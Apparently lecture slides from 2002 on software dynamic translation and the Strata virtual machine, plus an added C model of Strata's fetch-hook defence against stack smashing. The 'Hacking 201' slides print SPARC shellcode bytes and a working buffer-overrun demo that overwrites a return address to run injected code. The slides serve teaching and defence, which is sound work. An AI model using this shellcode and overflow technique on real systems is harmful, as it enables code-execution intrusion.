Applications of Software Dynamic Translation

Jack Davidson
University of Virginia
February 27, 2002

University of Virginia Department of Computer Science


What is SDT?

- Software: Implemented using flexible, software VM
- Dynamic: Operates on running programs
- Translation: Modifies some or all of a program's instructions before they execute


Software Dynamic Translation

[Diagram labels: Application; Strata Virtual Machine (Context Management, Linker, Memory Management, Strata Virtual CPU, Cache Management, Target Interface, Target-specific Functions); Host CPU]


Why Use SDT?

- Improve program performance
- Overcome economic barriers
- Code decompression
- Resource management
- Allow one architecture's binaries to run on another
- Application specific ISA improvements
- Adapt program to its execution environment
  - Power, memory footprint, resource protection
- Software engineering and quality control
  - Performance monitoring, fault isolation, debugging


Strata

- Infrastructure designed for building SDTs
- Can be extended to support a wide variety of SDT applications
- Provides:
  - Platform independent common services
  - Target interface that abstracts target-specific support functions
  - Target-specific support functions
    - SPARC and MIPS
    - ARM and x86 (underway)


Strata Virtual Machine

[Flowchart labels: Context Capture, New PC, Cached?, New Fragment, Fetch, Decode, Translate, Context Switch, Finished?, Next PC; Host CPU (Executing Translated Code from Cache)]

- Base VM implements a simple SDT
- Programmer implements new SDTs by customizing the VM
- VM is customized by overriding functions in the target interface


Computer Viruses

- Melissa, Code Red, Nimda, I Love You
- Cost of dealing with viruses is high
  - Code Red cost $1.2B (USA Today)
  - Melissa cost $385M (TruSecure Corp)
- Most viruses use a buffer overrun exploit to gain control


Spread of Code Red

[Animation]


Hacking 101

- Exploit lack of bounds checking in C programs
- Malicious user provides input string that is actually code
- Change return address to jump to malicious code by overrunning a buffer
- Typically use strcpy(), strcat(), sprintf(), etc.


Buffer Overrun Attacks

[Stack diagram labels: Top of Stack, String Growth, Malicious Code, NOP NOP NOP, Return Address, Local Variables, Stack Growth, Buffer]


Hacking 201

    #include <stdio.h>

    char shellcode[] =
        "\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e\x2f\x0b\xda\xdc\xae\x15\xe3\x68"
        "\x90\x0b\x80\x0e\x92\x03\xa0\x0c\x94\x1a\x80\x0a\x9c\x03\xa0\x14"
        "\xec\x3b\xbf\xec\xc0\x23\xbf\xf4\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc"
        "\x82\x10\x20\x3b\x91\xd0\x20\x08\x90\x1b\xc0\x0f\x82\x10\x20\x01"
        "\x91\xd0\x20\x08\x81\xc7\xe0\x08\x83\xe8\x40\x01";


Hacking 201

    /* The declarations of large_string, long_ptr and i are not shown on the slide. */
    void trustme (void)
    {
        unsigned buffer[24];

        printf("Evil buffer lives at %08x\n", buffer);
        long_ptr = (long *)large_string;
        /* Fill the string with an address just below the buffer. */
        for (i=0; i<44; i++)
            *(long_ptr+i) = ((int)buffer) - 8;
        /* Place the injected code at the start of the string. */
        for (i=0; i<(int)strlen(shellcode); i++)
            large_string[i] = shellcode[i];
        /* Unbounded copy: overruns buffer and overwrites the return address. */
        strcpy((char *)buffer, large_string);
        return;
    }

    void naive (void)
    {
        trustme();
        return; /* This should execute the injected code. */
    }

    void main (int argc, char *argv[])
    {
        naive();
        printf("Nothing bad happened!\n");
    }


Stopping Viruses with Strata

[Diagram labels: Host CPU and OS, Allowed action, Strata, Denied action, Virus]


Preventing Stack Smashing Attacks with Strata

Override fetch

    /* Start from the SPARC target interface and replace its fetch hook. */
    TI = SPARC_TI;
    TI.fetch = my_fetch;

    insn_t my_fetch (iaddr_t PC) {
        /* Refuse to fetch any instruction whose address lies on the stack. */
        if (in_stack(PC))
            strata_fatal("Smash!");
        else
            return (*SPARC_TI.fetch)(PC);
    }


Strata Security API

With the security API a user can specify and implement security policies:

- Prevent suid programs from exec'ing a shell
- Filter URLs
- Sandbox file system
- Prevent writes to specified files (e.g., registry)
- Produce audit trails
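The fetch override from the "Preventing Stack Smashing Attacks with Strata" slide, modelled as a self-contained C program. This is an added example, not Strata code: target_if_t, base_fetch, policy_fetch, translate_fragment and the two arrays standing in for the text segment and the stack are assumptions, and the policy reports a denial instead of calling strata_fatal() so that the outcome can be checked.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

typedef uintptr_t iaddr_t;
typedef uint32_t  insn_t;

/* Hypothetical stand-in for a target interface: a table of overridable hooks. */
typedef struct { insn_t (*fetch)(iaddr_t pc); } target_if_t;

/* Constructed address space: four "text" words and an array playing the stack. */
static insn_t text_seg[4] = { 0x11111111u, 0x22222222u, 0x33333333u, 0x44444444u };
static insn_t stack_seg[64];
static int denied;                 /* set when the policy refuses a fetch */

static int in_stack(iaddr_t pc) {
    iaddr_t base = (iaddr_t)stack_seg;
    return pc >= base && pc - base < sizeof stack_seg;
}

/* Default hook: read the instruction word at pc. */
static insn_t base_fetch(iaddr_t pc) { return *(const insn_t *)pc; }
static const target_if_t BASE_TI = { base_fetch };

/* Overriding hook: refuse stack addresses, otherwise defer to the base hook. */
static insn_t policy_fetch(iaddr_t pc) {
    if (in_stack(pc)) { denied = 1; return 0; }  /* the slide aborts here instead */
    return BASE_TI.fetch(pc);
}
static const target_if_t POLICY_TI = { policy_fetch };

/* Translator loop: every word passes through ti->fetch before it can enter the
 * code cache. Returns the number of words translated, or -1 on a denial. */
int translate_fragment(const target_if_t *ti, iaddr_t pc, size_t n, insn_t *cache) {
    denied = 0;
    for (size_t i = 0; i < n; i++) {
        insn_t w = ti->fetch(pc + i * sizeof(insn_t));
        if (denied) return -1;
        cache[i] = w;
    }
    return (int)n;
}

int main(void) {
    insn_t cache[4];
    printf("text:  %d\n", translate_fragment(&POLICY_TI, (iaddr_t)text_seg, 4, cache));
    printf("stack: %d\n", translate_fragment(&POLICY_TI, (iaddr_t)stack_seg, 4, cache));
    return 0;
}
```

Because the check runs when an instruction is fetched for translation, a word located in the stack range never reaches the code cache in this model and therefore never executes.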